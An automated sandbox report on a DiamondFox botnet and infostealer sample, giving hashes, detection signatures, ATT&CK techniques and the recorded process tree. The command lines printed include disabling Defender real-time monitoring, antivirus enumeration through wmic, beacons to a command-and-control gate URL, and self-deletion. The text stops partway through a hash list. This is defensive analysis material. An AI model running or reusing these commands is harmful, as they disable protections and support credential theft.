diamondfox | 2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

Analysis

max time kernel
136s
max time network
134s
platform
windows10_x64
resource
win10v20210408
submitted
04-07-2021 12:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe
Size

203KB
MD5

a1e165e1926c0c83123c89fce6b1af56
SHA1

281246ba4b852a5f62e032424f7816f5a6b0406f
SHA256

2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA512

28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

Score

10^/10

diamondfox botnet discovery spyware stealer

Malware Config

Signatures

DiamondFox
DiamondFox is a multipurpose botnet with many capabilities.
botnet stealer diamondfox

DiamondFox payload 11 IoCs

Detects DiamondFox payload in file/memory.

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe	diamondfox
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe	diamondfox
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe	diamondfox
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe	diamondfox
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe	diamondfox
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe	diamondfox
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe	diamondfox
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe	diamondfox
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe	diamondfox
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe	diamondfox
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe	diamondfox

NirSoft MailPassView 2 IoCs

Password recovery tool for various email clients

Processes:

resource	yara_rule
behavioral2/memory/1524-209-0x000000000044412E-mapping.dmp	MailPassView
behavioral2/memory/1524-211-0x0000000000400000-0x0000000000455000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 2 IoCs

Password recovery tool for various web browsers

Processes:

resource	yara_rule
behavioral2/memory/2300-196-0x00000000004466F4-mapping.dmp	WebBrowserPassView
behavioral2/memory/2300-198-0x0000000000400000-0x000000000047C000-memory.dmp	WebBrowserPassView

Nirsoft 6 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2300-196-0x00000000004466F4-mapping.dmp	Nirsoft
behavioral2/memory/2300-198-0x0000000000400000-0x000000000047C000-memory.dmp	Nirsoft
behavioral2/memory/2264-206-0x0000000000413E10-mapping.dmp	Nirsoft
behavioral2/memory/2264-208-0x0000000000400000-0x0000000000422000-memory.dmp	Nirsoft
behavioral2/memory/1524-209-0x000000000044412E-mapping.dmp	Nirsoft
behavioral2/memory/1524-211-0x0000000000400000-0x0000000000455000-memory.dmp	Nirsoft

Executes dropped EXE 10 IoCs

Processes:

MicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exe

pid	process
4084	MicrosoftEdgeCPS.exe
2300	MicrosoftEdgeCPS.exe
592	MicrosoftEdgeCPS.exe
2264	MicrosoftEdgeCPS.exe
1524	MicrosoftEdgeCPS.exe
656	MicrosoftEdgeCPS.exe
2236	MicrosoftEdgeCPS.exe
196	MicrosoftEdgeCPS.exe
3584	MicrosoftEdgeCPS.exe
1280	MicrosoftEdgeCPS.exe

Deletes itself 1 IoCs

Processes:

powershell.exe

pid process

2852 powershell.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Suspicious use of SetThreadContext 9 IoCs

Processes:

MicrosoftEdgeCPS.exe

description	pid	process	target process
PID 4084 set thread context of 2300	4084	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 4084 set thread context of 592	4084	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 4084 set thread context of 2264	4084	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 4084 set thread context of 1524	4084	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 4084 set thread context of 656	4084	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 4084 set thread context of 2236	4084	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 4084 set thread context of 196	4084	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 4084 set thread context of 3584	4084	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 4084 set thread context of 1280	4084	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

3868 1280 WerFault.exe MicrosoftEdgeCPS.exe
Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

notepad.exe

pid process

1632 notepad.exe

pid	pid_target	process	target process
3868	1280	WerFault.exe	MicrosoftEdgeCPS.exe

pid	process
1632	notepad.exe

Suspicious behavior: EnumeratesProcesses 34 IoCs

Processes:

powershell.exepowershell.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeWerFault.exe

pid	process
2852	powershell.exe
2308	powershell.exe
2852	powershell.exe
2308	powershell.exe
2852	powershell.exe
2308	powershell.exe
4084	MicrosoftEdgeCPS.exe
4084	MicrosoftEdgeCPS.exe
2300	MicrosoftEdgeCPS.exe
2300	MicrosoftEdgeCPS.exe
2300	MicrosoftEdgeCPS.exe
2300	MicrosoftEdgeCPS.exe
2264	MicrosoftEdgeCPS.exe
2264	MicrosoftEdgeCPS.exe
1280	MicrosoftEdgeCPS.exe
1280	MicrosoftEdgeCPS.exe
4084	MicrosoftEdgeCPS.exe
4084	MicrosoftEdgeCPS.exe
3868	WerFault.exe
3868	WerFault.exe
3868	WerFault.exe
3868	WerFault.exe
3868	WerFault.exe
3868	WerFault.exe
3868	WerFault.exe
3868	WerFault.exe
3868	WerFault.exe
3868	WerFault.exe
3868	WerFault.exe
3868	WerFault.exe
3868	WerFault.exe
3868	WerFault.exe
4084	MicrosoftEdgeCPS.exe
4084	MicrosoftEdgeCPS.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

wmic.exepowershell.exepowershell.exewmic.exe

description	pid	process
Token: SeIncreaseQuotaPrivilege	2080	wmic.exe
Token: SeSecurityPrivilege	2080	wmic.exe
Token: SeTakeOwnershipPrivilege	2080	wmic.exe
Token: SeLoadDriverPrivilege	2080	wmic.exe
Token: SeSystemProfilePrivilege	2080	wmic.exe
Token: SeSystemtimePrivilege	2080	wmic.exe
Token: SeProfSingleProcessPrivilege	2080	wmic.exe
Token: SeIncBasePriorityPrivilege	2080	wmic.exe
Token: SeCreatePagefilePrivilege	2080	wmic.exe
Token: SeBackupPrivilege	2080	wmic.exe
Token: SeRestorePrivilege	2080	wmic.exe
Token: SeShutdownPrivilege	2080	wmic.exe
Token: SeDebugPrivilege	2080	wmic.exe
Token: SeSystemEnvironmentPrivilege	2080	wmic.exe
Token: SeRemoteShutdownPrivilege	2080	wmic.exe
Token: SeUndockPrivilege	2080	wmic.exe
Token: SeManageVolumePrivilege	2080	wmic.exe
Token: 33	2080	wmic.exe
Token: 34	2080	wmic.exe
Token: 35	2080	wmic.exe
Token: 36	2080	wmic.exe
Token: SeDebugPrivilege	2308	powershell.exe
Token: SeDebugPrivilege	2852	powershell.exe
Token: SeIncreaseQuotaPrivilege	2080	wmic.exe
Token: SeSecurityPrivilege	2080	wmic.exe
Token: SeTakeOwnershipPrivilege	2080	wmic.exe
Token: SeLoadDriverPrivilege	2080	wmic.exe
Token: SeSystemProfilePrivilege	2080	wmic.exe
Token: SeSystemtimePrivilege	2080	wmic.exe
Token: SeProfSingleProcessPrivilege	2080	wmic.exe
Token: SeIncBasePriorityPrivilege	2080	wmic.exe
Token: SeCreatePagefilePrivilege	2080	wmic.exe
Token: SeBackupPrivilege	2080	wmic.exe
Token: SeRestorePrivilege	2080	wmic.exe
Token: SeShutdownPrivilege	2080	wmic.exe
Token: SeDebugPrivilege	2080	wmic.exe
Token: SeSystemEnvironmentPrivilege	2080	wmic.exe
Token: SeRemoteShutdownPrivilege	2080	wmic.exe
Token: SeUndockPrivilege	2080	wmic.exe
Token: SeManageVolumePrivilege	2080	wmic.exe
Token: 33	2080	wmic.exe
Token: 34	2080	wmic.exe
Token: 35	2080	wmic.exe
Token: 36	2080	wmic.exe
Token: SeIncreaseQuotaPrivilege	3180	wmic.exe
Token: SeSecurityPrivilege	3180	wmic.exe
Token: SeTakeOwnershipPrivilege	3180	wmic.exe
Token: SeLoadDriverPrivilege	3180	wmic.exe
Token: SeSystemProfilePrivilege	3180	wmic.exe
Token: SeSystemtimePrivilege	3180	wmic.exe
Token: SeProfSingleProcessPrivilege	3180	wmic.exe
Token: SeIncBasePriorityPrivilege	3180	wmic.exe
Token: SeCreatePagefilePrivilege	3180	wmic.exe
Token: SeBackupPrivilege	3180	wmic.exe
Token: SeRestorePrivilege	3180	wmic.exe
Token: SeShutdownPrivilege	3180	wmic.exe
Token: SeDebugPrivilege	3180	wmic.exe
Token: SeSystemEnvironmentPrivilege	3180	wmic.exe
Token: SeRemoteShutdownPrivilege	3180	wmic.exe
Token: SeUndockPrivilege	3180	wmic.exe
Token: SeManageVolumePrivilege	3180	wmic.exe
Token: 33	3180	wmic.exe
Token: 34	3180	wmic.exe
Token: 35	3180	wmic.exe

Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

MicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exe

pid process

592 MicrosoftEdgeCPS.exe
2236 MicrosoftEdgeCPS.exe
196 MicrosoftEdgeCPS.exe

pid	process
592	MicrosoftEdgeCPS.exe
2236	MicrosoftEdgeCPS.exe
196	MicrosoftEdgeCPS.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exeMicrosoftEdgeCPS.exe

description	pid	process	target process
PID 776 wrote to memory of 4084	776	2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe	MicrosoftEdgeCPS.exe
PID 776 wrote to memory of 4084	776	2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe	MicrosoftEdgeCPS.exe
PID 776 wrote to memory of 4084	776	2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe	MicrosoftEdgeCPS.exe
PID 776 wrote to memory of 2852	776	2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe	powershell.exe
PID 776 wrote to memory of 2852	776	2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe	powershell.exe
PID 776 wrote to memory of 2852	776	2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe	powershell.exe
PID 4084 wrote to memory of 2308	4084	MicrosoftEdgeCPS.exe	powershell.exe
PID 4084 wrote to memory of 2308	4084	MicrosoftEdgeCPS.exe	powershell.exe
PID 4084 wrote to memory of 2308	4084	MicrosoftEdgeCPS.exe	powershell.exe
PID 4084 wrote to memory of 2080	4084	MicrosoftEdgeCPS.exe	wmic.exe
PID 4084 wrote to memory of 2080	4084	MicrosoftEdgeCPS.exe	wmic.exe
PID 4084 wrote to memory of 2080	4084	MicrosoftEdgeCPS.exe	wmic.exe
PID 4084 wrote to memory of 3180	4084	MicrosoftEdgeCPS.exe	wmic.exe
PID 4084 wrote to memory of 3180	4084	MicrosoftEdgeCPS.exe	wmic.exe
PID 4084 wrote to memory of 3180	4084	MicrosoftEdgeCPS.exe	wmic.exe
PID 4084 wrote to memory of 2792	4084	MicrosoftEdgeCPS.exe	wmic.exe
PID 4084 wrote to memory of 2792	4084	MicrosoftEdgeCPS.exe	wmic.exe
PID 4084 wrote to memory of 2792	4084	MicrosoftEdgeCPS.exe	wmic.exe
PID 4084 wrote to memory of 1076	4084	MicrosoftEdgeCPS.exe	wmic.exe
PID 4084 wrote to memory of 1076	4084	MicrosoftEdgeCPS.exe	wmic.exe
PID 4084 wrote to memory of 1076	4084	MicrosoftEdgeCPS.exe	wmic.exe
PID 4084 wrote to memory of 2272	4084	MicrosoftEdgeCPS.exe	wmic.exe
PID 4084 wrote to memory of 2272	4084	MicrosoftEdgeCPS.exe	wmic.exe
PID 4084 wrote to memory of 2272	4084	MicrosoftEdgeCPS.exe	wmic.exe
PID 4084 wrote to memory of 2140	4084	MicrosoftEdgeCPS.exe	wmic.exe
PID 4084 wrote to memory of 2140	4084	MicrosoftEdgeCPS.exe	wmic.exe
PID 4084 wrote to memory of 2140	4084	MicrosoftEdgeCPS.exe	wmic.exe
PID 4084 wrote to memory of 2944	4084	MicrosoftEdgeCPS.exe	wmic.exe
PID 4084 wrote to memory of 2944	4084	MicrosoftEdgeCPS.exe	wmic.exe
PID 4084 wrote to memory of 2944	4084	MicrosoftEdgeCPS.exe	wmic.exe
PID 4084 wrote to memory of 2300	4084	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 4084 wrote to memory of 2300	4084	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 4084 wrote to memory of 2300	4084	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 4084 wrote to memory of 2300	4084	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 4084 wrote to memory of 2300	4084	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 4084 wrote to memory of 2300	4084	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 4084 wrote to memory of 2300	4084	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 4084 wrote to memory of 2300	4084	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 4084 wrote to memory of 2300	4084	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 4084 wrote to memory of 592	4084	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 4084 wrote to memory of 592	4084	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 4084 wrote to memory of 592	4084	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 4084 wrote to memory of 592	4084	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 4084 wrote to memory of 592	4084	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 4084 wrote to memory of 592	4084	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 4084 wrote to memory of 592	4084	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 4084 wrote to memory of 592	4084	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 4084 wrote to memory of 2264	4084	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 4084 wrote to memory of 2264	4084	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 4084 wrote to memory of 2264	4084	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 4084 wrote to memory of 2264	4084	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 4084 wrote to memory of 2264	4084	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 4084 wrote to memory of 2264	4084	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 4084 wrote to memory of 2264	4084	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 4084 wrote to memory of 2264	4084	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 4084 wrote to memory of 2264	4084	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 4084 wrote to memory of 1524	4084	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 4084 wrote to memory of 1524	4084	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 4084 wrote to memory of 1524	4084	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 4084 wrote to memory of 1524	4084	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 4084 wrote to memory of 1524	4084	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 4084 wrote to memory of 1524	4084	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 4084 wrote to memory of 1524	4084	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 4084 wrote to memory of 1524	4084	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe

C:\Users\Admin\AppData\Local\Temp\2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe
"C:\Users\Admin\AppData\Local\Temp\2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:776

C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
"C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4084

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableRealtimeMonitoring 1
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2308

C:\Windows\SysWOW64\Wbem\wmic.exe
"wmic" /Node:localhost /Namespace:\\root\SecurityCenter2 path AntiVirusProduct get DisplayName /FORMAT:List
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2080

C:\Windows\SysWOW64\Wbem\wmic.exe
"wmic" os get caption /FORMAT:List
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3180

C:\Windows\SysWOW64\Wbem\wmic.exe
"wmic" path win32_VideoController get caption /FORMAT:List
3⤵
PID:2792

C:\Windows\SysWOW64\Wbem\wmic.exe
"wmic" path win32_NetworkAdapterConfiguration where IPEnabled=1 get IPAddress /FORMAT:List
3⤵
PID:1076

C:\Windows\SysWOW64\Wbem\wmic.exe
"wmic" LogicalDisk Where DriveType=4 get VolumeName /FORMAT:List
3⤵
PID:2272

C:\Windows\SysWOW64\Wbem\wmic.exe
"wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List
3⤵
PID:2140

C:\Windows\SysWOW64\Wbem\wmic.exe
"wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List
3⤵
PID:2944

C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
/scomma "C:\Users\Admin\AppData\Local\Temp\1.log"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2300

C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
/scomma "C:\Users\Admin\AppData\Local\Temp\4.log"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:592

C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
/scomma "C:\Users\Admin\AppData\Local\Temp\2.log"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2264

C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
/scomma "C:\Users\Admin\AppData\Local\Temp\3.log"
3⤵
- Executes dropped EXE
PID:1524

C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
X http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d8
3⤵
- Executes dropped EXE
PID:656

C:\Windows\notepad.exe
X C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
4⤵
- Opens file in notepad (likely ransom note)
PID:1632

C:\Windows\write.exe
X C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
4⤵
PID:3080

C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
X http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d8
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2236

C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
X http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d8
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:196

C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
X http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d8
3⤵
- Executes dropped EXE
PID:3584

C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
X http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d8
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1280

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1280 -s 588
4⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
PID:3868

C:\Windows\SysWOW64\Wbem\wmic.exe
"wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List
3⤵
PID:3796

C:\Windows\SysWOW64\Wbem\wmic.exe
"wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List
3⤵
PID:3544

C:\Windows\SysWOW64\Wbem\wmic.exe
"wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List
3⤵
PID:408

C:\Windows\SysWOW64\Wbem\wmic.exe
"wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List
3⤵
PID:2672

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" Start-Sleep -s 10; Remove-Item -Path 'C:\Users\Admin\AppData\Local\Temp\2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe' -Force -Recurse
2⤵
- Deletes itself
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2852

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
MD5
1c19c16e21c97ed42d5beabc93391fc5

SHA1
8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68

SHA256
1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05

SHA512
7d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
b2fa30cc11eddf10214bf9962e1eb6a8

SHA1
4224949a0aa0547630c33d933a4efc26fbd2ba0a

SHA256
1ce826fcc07ce27822102163c3f2b8c6ce480b13ceab14bbd102b06bb3dd7004

SHA512
603ad06f1c635a33384c2391cc80777c53a1c768ee7cc357ce5513b957c69082692d056d4be9dc9c5f64455d0818142063d82fc45ca7195a238e9c608a3ed4ee

Download Submit
C:\Users\Admin\AppData\Local\Temp\1.log
MD5
4ab56e327e56a995c158a6116430835b

SHA1
bf39dbae7798cc8bd7d7073998b09652412b111b

SHA256
269c32926bf6faebe0581c23903f8dc8cef41ad46b333435d038b81d47f4785e

SHA512
37704769bf293cd6a9c0ccbec359fbb7278f163911d3f2ae27f6c9c3dece55be70c2c5695be953def5984b7eda05953b19581df236c44d5d269cf258e49ab4af

Download Submit
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
MD5
a1e165e1926c0c83123c89fce6b1af56

SHA1
281246ba4b852a5f62e032424f7816f5a6b0406f

SHA256
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

SHA512
28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

Download Submit
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
MD5
a1e165e1926c0c83123c89fce6b1af56

SHA1
281246ba4b852a5f62e032424f7816f5a6b0406f

SHA256
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

SHA512
28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

Download Submit
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
MD5
a1e165e1926c0c83123c89fce6b1af56

SHA1
281246ba4b852a5f62e032424f7816f5a6b0406f

SHA256
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

SHA512
28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

Download Submit
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
MD5
a1e165e1926c0c83123c89fce6b1af56

SHA1
281246ba4b852a5f62e032424f7816f5a6b0406f

SHA256
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

SHA512
28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

Download Submit
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
MD5
a1e165e1926c0c83123c89fce6b1af56

SHA1
281246ba4b852a5f62e032424f7816f5a6b0406f

SHA256
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

SHA512
28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

Download Submit
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
MD5
a1e165e1926c0c83123c89fce6b1af56

SHA1
281246ba4b852a5f62e032424f7816f5a6b0406f

SHA256
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

SHA512
28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

Download Submit
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
MD5
a1e165e1926c0c83123c89fce6b1af56

SHA1
281246ba4b852a5f62e032424f7816f5a6b0406f

SHA256
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

SHA512
28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

Download Submit
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
MD5
a1e165e1926c0c83123c89fce6b1af56

SHA1
281246ba4b852a5f62e032424f7816f5a6b0406f

SHA256
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

SHA512
28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

Download Submit
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
MD5
a1e165e1926c0c83123c89fce6b1af56

SHA1
281246ba4b852a5f62e032424f7816f5a6b0406f

SHA256
